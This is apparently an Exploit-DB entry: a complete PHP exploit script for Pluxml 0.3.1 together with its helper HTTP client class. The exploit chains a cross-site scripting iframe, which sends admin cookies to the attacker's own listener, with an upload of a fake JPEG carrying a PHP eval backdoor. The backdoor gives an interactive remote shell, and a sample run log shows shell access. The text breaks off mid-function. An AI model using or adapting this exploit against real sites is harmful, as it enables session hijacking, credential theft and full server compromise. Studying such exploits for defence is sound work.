Pluxml 0.3.1 - Remote Code Execution Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:4096", "cvelist": ["CVE-2007-3542", "CVE-2007-3432"], "modified": "2007-06-24T00:00:00", "lastseen": "2016-01-31T20:09:01", "edition": 1, "sourceData": "<?php\n# C:\\> sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196\n# [/]Waiting for connection on http://90.27.10.196:80/\n# [!]Now you have to make the victim to click on the url\n# [+]Received 395 bytes from 182.26.54.2:2007\n# [+]Sending 366 bytes to 182.26.54.2:2007\n# [+]Received 326 bytes from 182.26.54.2:2009\n# [+]Sending 366 bytes to 182.26.54.2:2009\n# [+]Received 692 bytes from 182.26.54.2:2010\n# [!]Received one cookie from 182.26.54.2:2010\n# [/]Verifying if there is a valid session id cookie\n# [-]No: pollvote=1\n# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b\n# [+]The created socket has been shut down\n# $shell> whoami\n# darkfig\n#\nif($argc < 5)\n{\nprint(\"\n------------ Pluxml 0.3.1 Remote Code Execution Exploit -------------\n---------------------------------------------------------------------\n Credits: DarkFig <gmdarkfig@gmail.com>\n URL: acid-root.new.fr || mgsdl.free.fr\n IRC: #acidroot@irc.worldnet.net\n Note: Coded for fun 8)\n---------------------------------------------------------------------\n Usage: $argv[0] -url <> -ip <> [Options]\n Params: -url For example http://victim.com/pluxml0.3.1/\n -ip The IP that will be bound to the socket\n Options: -port The socket will listen on this port (default=80)\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\n---------------------------------------------------------------------\n\");exit(1);\n}\n\n# PhpSploit object\n####################\n$xpl = new phpsploit();\n$xpl->agent('Firefox');\n\n# Server\n##########\n$server_addr = getparam('ip',1);\n$server_port = (getparam('port')!='') ? getparam('port') : '80';\n$server_url = \"http://$server_addr:$server_port/\";\n\n# Victim\n##########\n$hack = getparam('url',1);\n$html = \"<h1>hello :)</h1>\\n\";\n\n# Apparently my XSS bypass NoScript protection\n################################################\n$xss = \"<iframe src='${hack}pluxml/admin/auth.php?msg=\"\n .\"<script>document.location=(\".char($server_url.'?c=')\n .\".concat(document.cookie))</script>'\"\n .\" height=0 width=0>\";\n\n# Socket\n##########\n$handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\nsocket_bind($handle, $server_addr, $server_port);\nsocket_listen($handle);\n\nprint \"\\n[/]Waiting for connection on $server_url\";\nprint \"\\n[!]Now you have to make the victim to click on the url\";\n\n# Wait until we get admin rights\n##################################\nwhile(TRUE)\n{\n\t$packet = '';\n\t\n\tif(!$msg = socket_accept($handle))\n\t exit(1);\n\n\t# End of the packet ?\n\t######################\n\twhile(!ereg(\"\\r\\n\\r\\n\",$packet))\n\t $packet .= socket_read($msg, 2048, PHP_BINARY_READ);\n\t \n socket_getpeername($msg, $clientaddr, $clientport);\n print \"\\n[+]Received \".strlen($packet).\" bytes from $clientaddr:$clientport\";\n\n\t# Server response\n\t##################\n\t$serv =\n\t \"HTTP 1.x 200 OK\\r\\n\"\n\t.\"Connection: close\\r\\n\"\n\t.\"Transfer-Encoding: chunked\\r\\n\"\n\t.\"Content-Type: text/html\\r\\n\\r\\n\"\n\t.$html.$xss.\"\\r\\n\\r\\n\";\n\n\t# Is there a cookie ?\n\t#######################\n\tif(preg_match(\"#\\?c=(\\S*) HTTP/1\\.([01x]+)#\", $packet, $cookies))\n\t{\n\t\tprint \"\\n[!]Received one cookie from $clientaddr:$clientport\";\n\t\tprint \"\\n[/]Verifying if there is a valid session id cookie\";\n\t\t$cookie = explode(';%20',$cookies[1]);\n\t\t\n\t\tforeach($cookie as $session)\n\t\t{\n\t\t\t# Valid session id ?\n\t\t\t#######################\n\t\t\tif(is_valid_session($session))\n\t\t\t\n\t\t\t # Let's upload a file\n\t\t\t #######################\n\t\t\t code_execution();\n\t\t}\n\t\tprint \"\\n[-]No valid session id cookie found\";\n\t\tprint \"\\n[/]Always waiting for connection\";\n\t}\n\t# Answer to the client\n\t########################\n\telse\n\t{\n\t\tprint \"\\n[+]Sending \".strlen($serv).\" bytes to $clientaddr:$clientport\";\n\t\tsocket_write($msg, $serv, strlen($serv));\n\t}\n\tsocket_close($msg);\n}\n\n# Function which is like getopt()\n###################################\nfunction getparam($param,$opt='')\n{\n\tglobal $argv;\n\t\n\tforeach($argv as $value => $key)\n\t{\n\t\tif($key == '-'.$param)\n\t\t return $argv[$value+1];\n\t}\n\t\n\tif($opt)\n\t exit(\"-$param parameter required\");\n\telse\n\t return;\n}\n\n# Bypass magic_quotes_gpc\n###########################\nfunction char($data)\n{\n\t$char = 'String.fromCharCode(';\n\t\n\tfor($i=0;$i<strlen($data);$i++)\n\t{\n\t\t$char .= ord($data[$i]);\n\t\tif($i != (strlen($data)-1))\n\t\t $char .= ',';\n\t}\n\treturn $char.')';\n}\n\n# Admin session always available ?\n###################################\nfunction is_valid_session($session)\n{\n\tglobal $xpl,$hack;\n\t\n\t$xpl->addheader('Cookie',$session);\n\t$xpl->get($hack.'pluxml/admin/index.php');\n\t\n\tif(eregi('Location: auth.php', $xpl->getheader()))\n\t{\n\t\tprint \"\\n[-]No: $session\";\n\t\treturn FALSE;\n\t}\n\telse\n\t{\n\t\tprint \"\\n[!]Yes: $session\";\n\t\treturn TRUE;\n\t}\n}\n\n# File upload vulnerability\n#############################\nfunction code_execution()\n{\n\tglobal $xpl,$hack,$msg;\n\t\n\tsocket_close($msg);\n\tprint \"\\n[+]The created socket has been shut down\";\n\t\n\t# +images.php [File Upload Vulnerability]\n\t# |\n\t# 11. if(!empty($_FILES)){\n\t# 12. $uploaddir = '../../images/';\n\t# 13. $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);\n\t# 14. if(getimagesize($_FILES['userfile']['tmp_name'])){\n\t# 15.\t move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile);\n\t# 16.\t chmod($uploadfile, 0777);\n\t# 17.\t $msg = 'Image envoy\u0102\u0083\u00c2\u0160e';\n\t# 18. }else{\n\t# 19.\t $msg = 'Le fichier n\\'est pas une image';\n\t# 20. }\n\t# 21. header('Location: images.php?msg='.$msg);\n\t# 22. }\n\t#\n\t# Fake JPG 1x1\n\t# 000000A0 007F 3C3F 7068 700D 0A69 6628 6973 7365 ..<?php..if(isse\n\t# 000000B0 7428 245F 5345 5256 4552 5B48 5454 505F t($_SERVER[HTTP_\n\t# 000000C0 5348 454C 4C5D 2929 0D0A 7B0D 0A70 7269 SHELL]))..{..pri\n\t# 000000D0 6E74 2031 3233 3435 3637 3839 3130 3131 nt 1234567891011\n\t# 000000E0 3132 3B0D 0A65 7661 6C28 245F 5345 5256 12;..eval($_SERV\n\t# 000000F0 4552 5B48 5454 505F 5348 454C 4C5D 293B ER[HTTP_SHELL]);\n\t# 00000100 0D0A 7072 696E 7420 3132 3334 3536 3738 ..print 12345678\n\t# 00000110 3931 3031 3131 323B 0D0A 7D0D 0A3F 3EFF 9101112;..}..?\\>.\n\t#\n\t$fakejpg =\n\t\"\\xFF\\xD8\\xFF\\xE0\\x00\\x10\\x4A\\x46\\x49\\x46\\x00\\x01\\x01\\x01\\x00\"\n\t.\"\\x60\\x00\\x60\\x00\\x00\\xFF\\xDB\\x00\\x43\\x00\\x08\\x06\\x06\\x07\\x06\"\n\t.\"\\x05\\x08\\x07\\x07\\x07\\x09\\x09\\x08\\x0A\\x0C\\x14\\x0D\\x0C\\x0B\\x0B\"\n\t.\"\\x0C\\x19\\x12\\x13\\x0F\\x14\\x1D\\x1A\\x1F\\x1E\\x1D\\x1A\\x1C\\x1C\\x20\"\n\t.\"\\x24\\x2E\\x27\\x20\\x22\\x2C\\x23\\x1C\\x1C\\x28\\x37\\x29\\x2C\\x30\\x31\"\n\t.\"\\x34\\x34\\x34\\x1F\\x27\\x39\\x3D\\x38\\x32\\x3C\\x2E\\x33\\x34\\x32\\xFF\"\n\t.\"\\xDB\\x00\\x43\\x01\\x09\\x09\\x09\\x0C\\x0B\\x0C\\x18\\x0D\\x0D\\x18\\x32\"\n\t.\"\\x21\\x1C\\x21\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\"\n\t.\"\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\"\n\t.\"\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\"\n\t.\"\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\xFF\\xFE\\x00\\x7F\\x3C\\x3F\\x70\"\n\t.\"\\x68\\x70\\x0D\\x0A\\x69\\x66\\x28\\x69\\x73\\x73\\x65\\x74\\x28\\x24\\x5F\"\n\t.\"\\x53\\x45\\x52\\x56\\x45\\x52\\x5B\\x48\\x54\\x54\\x50\\x5F\\x53\\x48\\x45\"\n\t.\"\\x4C\\x4C\\x5D\\x29\\x29\\x0D\\x0A\\x7B\\x0D\\x0A\\x70\\x72\\x69\\x6E\\x74\"\n\t.\"\\x20\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x31\\x30\\x31\\x31\\x31\"\n\t.\"\\x32\\x3B\\x0D\\x0A\\x65\\x76\\x61\\x6C\\x28\\x24\\x5F\\x53\\x45\\x52\\x56\"\n\t.\"\\x45\\x52\\x5B\\x48\\x54\\x54\\x50\\x5F\\x53\\x48\\x45\\x4C\\x4C\\x5D\\x29\"\n\t.\"\\x3B\\x0D\\x0A\\x70\\x72\\x69\\x6E\\x74\\x20\\x31\\x32\\x33\\x34\\x35\\x36\"\n\t.\"\\x37\\x38\\x39\\x31\\x30\\x31\\x31\\x31\\x32\\x3B\\x0D\\x0A\\x7D\\x0D\\x0A\"\n\t.\"\\x3F\\x3E\\xFF\\xC0\\x00\\x11\\x08\\x00\\x01\\x00\\x01\\x03\\x01\\x22\\x00\"\n\t.\"\\x02\\x11\\x01\\x03\\x11\\x01\\xFF\\xC4\\x00\\x1F\\x00\\x00\\x01\\x05\\x01\"\n\t.\"\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\"\n\t.\"\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\\xFF\\xC4\\x00\\xB5\\x10\\x00\"\n\t.\"\\x02\\x01\\x03\\x03\\x02\\x04\\x03\\x05\\x05\\x04\\x04\\x00\\x00\\x01\\x7D\"\n\t.\"\\x01\\x02\\x03\\x00\\x04\\x11\\x05\\x12\\x21\\x31\\x41\\x06\\x13\\x51\\x61\"\n\t.\"\\x07\\x22\\x71\\x14\\x32\\x81\\x91\\xA1\\x08\\x23\\x42\\xB1\\xC1\\x15\\x52\"\n\t.\"\\xD1\\xF0\\x24\\x33\\x62\\x72\\x82\\x09\\x0A\\x16\\x17\\x18\\x19\\x1A\\x25\"\n\t.\"\\x26\\x27\\x28\\x29\\x2A\\x34\\x35\\x36\\x37\\x38\\x39\\x3A\\x43\\x44\\x45\"\n\t.\"\\x46\\x47\\x48\\x49\\x4A\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5A\\x63\\x64\"\n\t.\"\\x65\\x66\\x67\\x68\\x69\\x6A\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7A\\x83\"\n\t.\"\\x84\\x85\\x86\\x87\\x88\\x89\\x8A\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\"\n\t.\"\\x9A\\xA2\\xA3\\xA4\\xA5\\xA6\\xA7\\xA8\\xA9\\xAA\\xB2\\xB3\\xB4\\xB5\\xB6\"\n\t.\"\\xB7\\xB8\\xB9\\xBA\\xC2\\xC3\\xC4\\xC5\\xC6\\xC7\\xC8\\xC9\\xCA\\xD2\\xD3\"\n\t.\"\\xD4\\xD5\\xD6\\xD7\\xD8\\xD9\\xDA\\xE1\\xE2\\xE3\\xE4\\xE5\\xE6\\xE7\\xE8\"\n\t.\"\\xE9\\xEA\\xF1\\xF2\\xF3\\xF4\\xF5\\xF6\\xF7\\xF8\\xF9\\xFA\\xFF\\xC4\\x00\"\n\t.\"\\x1F\\x01\\x00\\x03\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x00\"\n\t.\"\\x00\\x00\\x00\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\"\n\t.\"\\xFF\\xC4\\x00\\xB5\\x11\\x00\\x02\\x01\\x02\\x04\\x04\\x03\\x04\\x07\\x05\"\n\t.\"\\x04\\x04\\x00\\x01\\x02\\x77\\x00\\x01\\x02\\x03\\x11\\x04\\x05\\x21\\x31\"\n\t.\"\\x06\\x12\\x41\\x51\\x07\\x61\\x71\\x13\\x22\\x32\\x81\\x08\\x14\\x42\\x91\"\n\t.\"\\xA1\\xB1\\xC1\\x09\\x23\\x33\\x52\\xF0\\x15\\x62\\x72\\xD1\\x0A\\x16\\x24\"\n\t.\"\\x34\\xE1\\x25\\xF1\\x17\\x18\\x19\\x1A\\x26\\x27\\x28\\x29\\x2A\\x35\\x36\"\n\t.\"\\x37\\x38\\x39\\x3A\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4A\\x53\\x54\\x55\"\n\t.\"\\x56\\x57\\x58\\x59\\x5A\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6A\\x73\\x74\"\n\t.\"\\x75\\x76\\x77\\x78\\x79\\x7A\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8A\"\n\t.\"\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9A\\xA2\\xA3\\xA4\\xA5\\xA6\\xA7\"\n\t.\"\\xA8\\xA9\\xAA\\xB2\\xB3\\xB4\\xB5\\xB6\\xB7\\xB8\\xB9\\xBA\\xC2\\xC3\\xC4\"\n\t.\"\\xC5\\xC6\\xC7\\xC8\\xC9\\xCA\\xD2\\xD3\\xD4\\xD5\\xD6\\xD7\\xD8\\xD9\\xDA\"\n\t.\"\\xE2\\xE3\\xE4\\xE5\\xE6\\xE7\\xE8\\xE9\\xEA\\xF2\\xF3\\xF4\\xF5\\xF6\\xF7\"\n\t.\"\\xF8\\xF9\\xFA\\xFF\\xDA\\x00\\x0C\\x03\\x01\\x00\\x02\\x11\\x03\\x11\\x00\"\n\t.\"\\x3F\\x00\\xF7\\xFA\\x28\\xA2\\x80\\x3F\\xFF\\xD9\";\n\t\n\t$formdata = array(\n\t frmdt_url => $hack.'pluxml/admin/images.php',\n\t 'userfile' => array(\n\t frmdt_filename => 'iwashere.php',\n\t frmdt_content => $fakejpg));\n\n\t$xpl->formdata($formdata);\n\tprint \"\\n\\$shell> \";\n\n\twhile(!preg_match('#^(quit|exit)$#', ($cmd = trim(fgets(STDIN)))))\n\t{\n\t\t# $shell> cat ../pluxml/conf/password.xml\n\t\t########################################\n\t\t$xpl->addheader('Shell',\"system('$cmd');\");\n\t\t$xpl->get($hack.'images/iwashere.php');\n\t\t$content = explode('1.23456789101E+014',$xpl->getcontent());\n\t\tprint $content[1].\"\\n\\$shell> \";\n\t}\n\texit(0);\n}\n\n/*\n * \n * Copyright (C) darkfig\n * \n * This program is free software; you can redistribute it and/or \n * modify it under the terms of the GNU General Public License \n * as published by the Free Software Foundation; either version 2 \n * of the License, or (at your option) any later version. \n * \n * This program is distributed in the hope that it will be useful, \n * but WITHOUT ANY WARRANTY; without even the implied warranty of \n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n * GNU General Public License for more details. \n * \n * You should have received a copy of the GNU General Public License \n * along with this program; if not, write to the Free Software \n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n * \n * TITLE: PhpSploit Class\n * REQUIREMENTS: PHP 4 / PHP 5\n * VERSION: 2.0\n * LICENSE: GNU General Public License\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\n * FILENAME: phpsploitclass.php\n *\n * CONTACT: gmdarkfig@gmail.com (french / english)\n * GREETZ: Sparah, Ddx39\n *\n * DESCRIPTION:\n * The phpsploit is a class implementing a web user agent.\n * You can add cookies, headers, use a proxy server with (or without) a\n * basic authentification. It supports the GET and the POST method. It can\n * also be used like a browser with the cookiejar() function (which allow\n * a server to add several cookies for the next requests) and the\n * allowredirection() function (which allow the script to follow all\n * redirections sent by the server). It can return the content (or the\n * headers) of the request. Others useful functions can be used for debugging.\n * A manual is actually in development but to know how to use it, you can\n * read the comments.\n *\n * CHANGELOG:\n *\n * [2007-06-10] (2.0)\n * * Code: Code optimization\n * * New: Compatible with PHP 4 by default\n *\n * [2007-01-24] (1.2)\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\n * * New: multipart/form-data enctype is now supported \n *\n * [2006-12-31] (1.1)\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\n * * New: You can now call the getheader() / getcontent() function without parameters\n *\n * [2006-12-30] (1.0)\n * * First version\n * \n */\n\nclass phpsploit\n{\n\tvar $proxyhost;\n\tvar $proxyport;\n\tvar $host;\n\tvar $path;\n\tvar $port;\n\tvar $method;\n\tvar $url;\n\tvar $packet;\n\tvar $proxyuser;\n\tvar $proxypass;\n\tvar $header;\n\tvar $cookie;\n\tvar $data;\n\tvar $boundary;\n\tvar $allowredirection;\n\tvar $last_redirection;\n\tvar $cookiejar;\n\tvar $recv;\n\tvar $cookie_str;\n\tvar $header_str;\n\tvar $server_content;\n\tvar $server_header;\n\t\n\n\t/**\n\t * This function is called by the\n\t * get()/post()/formdata() functions.\n\t * You don't have to call it, this is\n\t * the main function.\n\t *\n\t * @access private\n\t * @return string $this->recv ServerResponse\n\t * \n\t */\n\tfunction sock()\n\t{\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport))\n\t\t $socket = @fsockopen($this->proxyhost,$this->proxyport);\n\t\telse\n\t\t $socket = @fsockopen($this->host,$this->port);\n\t\t\n\t\tif(!$socket)\n\t\t die(\"Error: Host seems down\");\n\t\t\n\t\tif($this->method=='get')\n\t\t $this->packet = 'GET '.$this->url.\" HTTP/1.1\\r\\n\";\n\t\t \n\t\telseif($this->method=='post' or $this->method=='formdata')\n\t\t $this->packet = 'POST '.$this->url.\" HTTP/1.1\\r\\n\";\n\t\t \n\t\telse\n\t\t die(\"Error: Invalid method\");\n\t\t\n\t\tif(!empty($this->proxyuser))\n\t\t $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass).\"\\r\\n\";\n\t\t\n\t\tif(!empty($this->header))\n\t\t $this->packet .= $this->showheader();\n\t\t \n\t\tif(!empty($this->cookie))\n\t\t $this->packet .= 'Cookie: '.$this->showcookie().\"\\r\\n\";\n\t\n\t\t$this->packet .= 'Host: '.$this->host.\"\\r\\n\";\n\t\t$this->packet .= \"Connection: Close\\r\\n\";\n\t\t\n\t\tif($this->method=='post')\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\t\t\t$this->packet .= 'Content-Length: '.strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data.\"\\r\\n\";\n\t\t}\n\t\telseif($this->method=='formdata')\n\t\t{\n\t\t\t$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary.\"\\r\\n\";\n\t\t\t$this->packet .= 'Content-Length: '.strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data;\n\t\t}\n\n\t\t$this->packet .= \"\\r\\n\";\n\t\t$this->recv = '';\n\n\t\tfputs($socket,$this->packet);\n\n\t\twhile(!feof($socket))\n\t\t $this->recv .= fgets($socket);\n\n\t\tfclose($socket);\n\n\t\tif($this->cookiejar)\n\t\t $this->getcookie();\n\n\t\tif($this->allowredirection)\n\t\t return $this->getredirection();\n\t\telse\n\t\t return $this->recv;\n\t}\n\t\n\n\t/**\n\t * This function allows you to add several\n\t * cookies in the request.\n\t * \n\t * @access public\n\t * @param string cookn CookieName\n\t * @param string cookv CookieValue\n\t * @example $this->addcookie('name','value')\n\t * \n\t */\n\tfunction addcookie($cookn,$cookv)\n\t{\n\t\tif(!isset($this->cookie))\n\t\t $this->cookie = array();\n\n\t\t$this->cookie[$cookn] = $cookv;\n\t}\n\n\n\t/**\n\t * This function allows you to add several\n\t * headers in the request.\n\t *\n\t * @access public\n\t * @param string headern HeaderName\n\t * @param string headervalue Headervalue\n\t * @example $this->addheader('Client-IP', '128.5.2.3')\n\t * \n\t */\n\tfunction addheader($headern,$headervalue)\n\t{\n\t\tif(!isset($this->header))\n\t\t $this->header = array();\n\t\t \n\t\t$this->header[$headern] = $headervalue;\n\t}\n\n\n\t/**\n\t * This function allows you to use an\n\t * http proxy server. Several methods\n\t * are supported.\n\t * \n\t * @access public\n\t * @param string proxy ProxyHost\n\t * @param integer proxyp ProxyPort\n\t * @example $this->proxy('localhost',8118)\n\t * @example $this->proxy('localhost:8118')\n\t * \n\t */\n\tfunction proxy($proxy,$proxyp='')\n\t{\n\t\tif(empty($proxyp))\n\t\t{\n\t\t\t$proxarr = explode(':',$proxy);\n\t\t\t$this->proxyhost = $proxarr[0];\n\t\t\t$this->proxyport = (int)$proxarr[1];\n\t\t}\n\t\telse \n\t\t{\n\t\t\t$this->proxyhost = $proxy;\n\t\t\t$this->proxyport = (int)$proxyp;\n\t\t}\n\n\t\tif($this->proxyport > 65535)\n\t\t die(\"Error: Invalid port number\");\n\t}\n\t\n\n\t/**\n\t * This function allows you to use an\n\t * http proxy server which requires a\n\t * basic authentification. Several\n\t * methods are supported:\n\t *\n\t * @access public\n\t * @param string proxyauth ProxyUser\n\t * @param string proxypass ProxyPass\n\t * @example $this->proxyauth('user','pwd')\n\t * @example $this->proxyauth('user:pwd');\n\t * \n\t */\n\tfunction proxyauth($proxyauth,$proxypass='')\n\t{\n\t\tif(empty($proxypass))\n\t\t{\n\t\t\t$posvirg = strpos($proxyauth,':');\n\t\t\t$this->proxyuser = substr($proxyauth,0,$posvirg);\n\t\t\t$this->proxypass = substr($proxyauth,$posvirg+1);\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$this->proxyuser = $proxyauth;\n\t\t\t$this->proxypass = $proxypass;\n\t\t}\n\t}\n\n\n\t/**\n\t * This function allows you to set\n\t * the 'User-Agent' header.\n\t * \n\t * @access public\n\t * @param string useragent Agent\n\t * @example $this->agent('Firefox')\n\t * \n\t */\n\tfunction agent($useragent)\n\t{\n\t\t$this->addheader('User-Agent',$useragent);\n\t}\n\n\t\n\t/**\n\t * This function returns the headers\n\t * which will be in the next request.\n\t * \n\t * @access public\n\t * @return string $this->header_str Headers\n\t * @example $this->showheader()\n\t * \n\t */\n\tfunction showheader()\n\t{\n\t\t$this->header_str = '';\n\t\t\n\t\tif(!isset($this->header))\n\t\t return;\n\t\t \n\t\tforeach($this->header as $name => $value)\n\t\t $this->header_str .= $name.': '.$value.\"\\r\\n\";\n\t\t \n\t\treturn $this->header_str;\n\t}\n\n\t\n\t/**\n\t * This function returns the cookies\n\t * which will be in the next request.\n\t * \n\t * @access public\n\t * @return string $this->cookie_str Cookies\n\t * @example $this->showcookie()\n\t * \n\t */\n\tfunction showcookie()\n\t{\n\t\t$this->cookie_str = '';\n\t\t\n\t\tif(!isset($this->cookie))\n\t\t return;\n\t\t\n\t\tforeach($this->cookie as $name => $value)\n\t\t $this->cookie_str .= $name.'='.$value.'; ';\n\n\t\treturn $this->cookie_str;\n\t}\n\n\n\t/**\n\t * This function returns the last\n\t * formed http request.\n\t * \n\t * @access public\n\t * @return string $this->packet HttpPacket\n\t * @example $this->showlastrequest()\n\t * \n\t */\n\tfunction showlastrequest()\n\t{\n\t\tif(!isset($this->packet))\n\t\t return;\n\t\telse\n\t\t return $this->packet;\n\t}\n\n\n\t/**\n\t * This function sends the formed\n\t * http packet with the GET method.\n\t * \n\t * @access public\n\t * @param string url Url\n\t * @return string $this->sock()\n\t * @example $this->get('localhost/index.php?var=x')\n\t * @example $this->get('http://localhost:88/tst.php')\n\t * \n\t */\n\tfunction get($url)\n\t{\n\t\t$this->target($url);\n\t\t$this->method = 'get';\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function sends the formed\n\t * http packet with the POST method.\n\t *\n\t * @access public\n\t * @param string url Url\n\t * @param string data PostData\n\t * @return string $this->sock()\n\t * @example $this->post('http://localhost/','helo=x')\n\t * \n\t */\t\n\tfunction post($url,$data)\n\t{\n\t\t$this->target($url);\n\t\t$this->method = 'post';\n\t\t$this->data = $data;\n\t\treturn $this->sock();\n\t}\n\t\n\n\t/**\n\t * This function sends the formed http\n\t * packet with the POST method using\n\t * the multipart/form-data enctype.\n\t * \n\t * @access public\n\t * @param array array FormDataArray\n\t * @return string $this->sock()\n\t * @example $formdata = array(\n\t * frmdt_url => 'http://localhost/upload.php',\n\t * frmdt_boundary => '123456', # Optional\n\t * 'var' => 'example',\n\t * 'file' => array(\n\t * frmdt_type => 'image/gif', # Optional\n\t * frmdt_transfert => 'binary' # Optional\n\t * frmdt_filename => 'hello.php,\n\t * frmdt_content => '<?php echo 1; ?>'));\n\t * $this->formdata($formdata);\n\t * \n\t */\n\tfunction formdata($array)\n\t{\n\t\t$this->target($array[frmdt_url]);\n\t\t$this->method = 'formdata';\n\t\t$this->data = '';\n\t\t\n\t\tif(!isset($array[frmdt_boundary]))\n\t\t $this->boundary = 'phpsploit';\n\t\telse\n\t\t $this->boundary = $array[frmdt_boundary];\n\n\t\tforeach($array as $key => $value)\n\t\t{\n\t\t\tif(!preg_match('#^frmdt_(boundary|url)#',$key))\n\t\t\t{\n\t\t\t\t$this->data .= str_repeat('-',29).$this->boundary.\"\\r\\n\";\n\t\t\t\t$this->data .= 'Content-Disposition: form-data; name=\"'.$key.'\";';\n\t\t\t\t\n\t\t\t\tif(!is_array($value))\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->data .= ' filename=\"'.$array[$key][frmdt_filename].\"\\\";\\r\\n\";\n\n\t\t\t\t\tif(isset($array[$key][frmdt_type]))\n\t\t\t\t\t $this->data .= 'Content-Type: '.$array[$key][frmdt_type].\"\\r\\n\";\n\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert]))\n\t\t\t\t\t $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert].\"\\r\\n\";\n\n\t\t\t\t\t$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t$this->data .= str_repeat('-',29).$this->boundary.\"--\\r\\n\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function returns the content\n\t * of the server response, without\n\t * the headers.\n\t * \n\t * @access public\n\t * @param string code ServerResponse\n\t * @return string $this->server_content\n\t * @example $this->getcontent()\n\t * @example $this->getcontent($this->get('http://localhost/'))\n\t * \n\t */\n\tfunction getcontent($code='')\n\t{\n\t\tif(empty($code))\n\t\t $code = $this->recv;\n\n\t\t$code = explode(\"\\r\\n\\r\\n\",$code);\n\t\t$this->server_content = '';\n\t\t\n\t\tfor($i=1;$i<count($code);$i++)\n\t\t $this->server_content .= $code[$i];\n\n\t\treturn $this->server_content;\n\t}\n\n\t\n\t/**\n\t * This function returns the headers\n\t * of the server response, without\n\t * the content.\n\t * \n\t * @access public\n\t * @param string code ServerResponse\n\t * @return string $this->server_header\n\t * @example $this->getcontent()\n\t * @example $this->getcontent($this->post('http://localhost/','1=2'))\n\t * \n\t */\n\tfunction getheader($code='')\n\t{\n\t\tif(empty($code))\n\t\t $code = $this->recv;\n\n\t\t$code = explode(\"\\r\\n\\r\\n\",$code);\n\t\t$this->server_header = $code[0];\n\t\t\n\t\treturn $this->server_header;\n\t}\n\n\t\n\t/**\n\t * This function is called by the\n\t * cookiejar() function. It adds the\n\t * value of the \"Set-Cookie\" header\n\t * in the \"Cookie\" header for the\n\t * next request. You don't have to\n\t * call it.\n\t * \n\t * @access private\n\t * @param string code ServerResponse\n\t * \n\t */\n\tfunction getcookie()\n\t{\n\t\tforeach(explode(\"\\r\\n\",$this->getheader()) as $header)\n\t\t{\n\t\t\tif(preg_match('/set-cookie/i',$header))\n\t\t\t{\n\t\t\t\t$fequal = strpos($header,'=');\n\t\t\t\t$fvirgu = strpos($header,';');\n\t\t\t\t\n\t\t\t\t// 12=strlen('set-cookie: ')\n\t\t\t\t$cname = substr($header,12,$fequal-12);\n\t\t\t\t$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));\n\t\t\t\t\n\t\t\t\t$this->cookie[trim($cname)] = trim($cvalu);\n\t\t\t}\n\t\t}\n\t}\n\n\n\t/**\n\t * This function is called by the\n\t * get()/post() functions. You\n\t * don't have to call it.\n\t *\n\t * @access private\n\t * @param string urltarg Url\n\t * @example $this->target('http://localhost/')\n\t * \n\t */\n\tfunction target($urltarg)\n\t{\n\t\tif(!ereg('^http://',$urltarg))\n\t\t $urltarg = 'http://'.$urltarg;\n\t\t \n\t\t$urlarr = parse_url($urltarg);\n\t\t$this->url = 'http://'.$urlarr['host'].$urlarr['path'];\n\t\t\n\t\tif(isset($urlarr['query']))\n\t\t $this->url .= '?'.$urlarr['query'];\n\t\t\n\t\t$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;\n\t\t$this->host = $urlarr['host'];\n\t\t\n\t\tif($this->port != '80')\n\t\t $this->host .= ':'.$this->port;\n\n\t\tif(!isset($urlarr['path']) or empty($urlarr['path']))\n\t\t die(\"Error: No path 